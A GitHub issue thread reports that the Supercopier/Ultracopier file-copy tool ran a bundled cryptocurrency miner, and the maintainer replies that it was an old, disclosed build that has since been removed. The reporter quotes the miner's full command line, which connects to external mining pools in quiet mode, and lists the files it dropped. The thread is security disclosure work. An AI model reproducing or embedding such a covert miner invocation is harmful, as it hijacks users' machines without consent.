Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

ULTRACOPIER IS USED TO MINE CRYPTOCURRENCY WITHOUT THE USERS KNOWLEDGE #23

Closed
iaji opened this issue Nov 14, 2017 · 7 comments

Comments

@iaji
Copy link

@iaji iaji commented Nov 14, 2017

"C:\Program Files\Supercopier\miner\miner.exe" --scrypt -o stratum+tcp://usa.wemineltc.com:3335 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://freedom.wemineltc.com:3334 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://hk2.wemineltc.com:80 -u alphaonex86.pool10 -p [RANDOM-STRING] -o stratum+tcp://usa.wemineltc.com:80 -u alphaonex86.pool10 -p [RANDOM-STRING] --no-adl --real-quiet -T -S opencl:auto

As you can see from the command line above Supercopier/Ultracopier launches a number of miner.exe processes which then connect out to a few domains associated with mining. At least hide your username from the command if you're going to try to pull something like this off...

Process Supercopier.exe made a DNS request to ultracopier.first-world[.]info and changed a registry value to ultracopier which makes me think this is the work of your Ultracopier despite the references to Supercopier in the command line.

Virustotal for Supercopier.exe: https://www.virustotal.com/en/file/b15fe48276d5280f2500aaa2aeabea0861f2317b1fc1843d08dfa9357aa92c3b/analysis/

Virsutotal for miner.exe: https://www.virustotal.com/en/file/b203ed791b259f2495b77e9f1c74f9ee40f4323fc904be5f31da695c86153036/analysis/

Here are some disk operations preformed by this software for its miner:
\Device\HarddiskVolume2\Program Files\Supercopier\miner\libevent-2-0-5.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libhidapi-0.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libblkmaker-0.1-0.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libblkmaker_jansson-0.1-0.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libcurl-4.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libusb-1.0.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\libjansson-4.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\pdcurses.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\pthreadGC2.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\zlib1.dll \Device\HarddiskVolume2\Program Files\Supercopier\miner\miner.exe

You should probably not do this...

@alphaonex86

This comment has been minimized.

Copy link
Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

Hi, where do you found this old version? The new version don't do this.

wemineltc.com is closed now.
Supercopier was merged with Ultracopier, then use the same base code and updater, it's why it connect to the ultracopier website.

@iaji

This comment has been minimized.

Copy link
Author

@iaji iaji commented Nov 14, 2017

It's not very ethical to have any software marketed as a file transfer program mine crypto in the background.

This program triggered an alert on some computers and I took a look at them, that's as much as I can say about this.

@alphaonex86

This comment has been minimized.

Copy link
Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

  1. We have choice it into 2013 for 6 months with the community to do the project more professional, thanks to this I was release the version 1.0
  2. This had dropped since years, we are into 2017
  3. It have big warning about this software contain a miner AND propose a version without miner, the miner version is only for the person who wish support the project and have freely the ultimate version (it's to fight against crack and other illegal version with backdoor and trojan)

Please, again: where do you found this very old version?

@iaji

This comment has been minimized.

Copy link
Author

@iaji iaji commented Nov 14, 2017

I wish I could let you know more but I am only the analyst and messenger. I did not install your software on the computers I looked at. I also do not know how the users installed your software (whether it was legit or cracked).

I thought I would inform you and the users about my findings, thanks for being so responsive in clearing this up.

@alphaonex86

This comment has been minimized.

Copy link
Owner

@alphaonex86 alphaonex86 commented Nov 14, 2017

Thanks, if you can known this, I will do my best effort to remove this old version of internet.

Update to don't have this.

@darkdragon-001

This comment has been minimized.

Copy link
Contributor

@darkdragon-001 darkdragon-001 commented Dec 5, 2017

Anyway, I would still suggest to remove the minder functionality from the source completely...

@alphaonex86

This comment has been minimized.

Copy link
Owner

@alphaonex86 alphaonex86 commented Dec 5, 2017

It's totally disabled via macro. And this suggest I have something to hide.
But to have cleaner code you are in right. Today I will do that's.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
3 participants
You can’t perform that action at this time.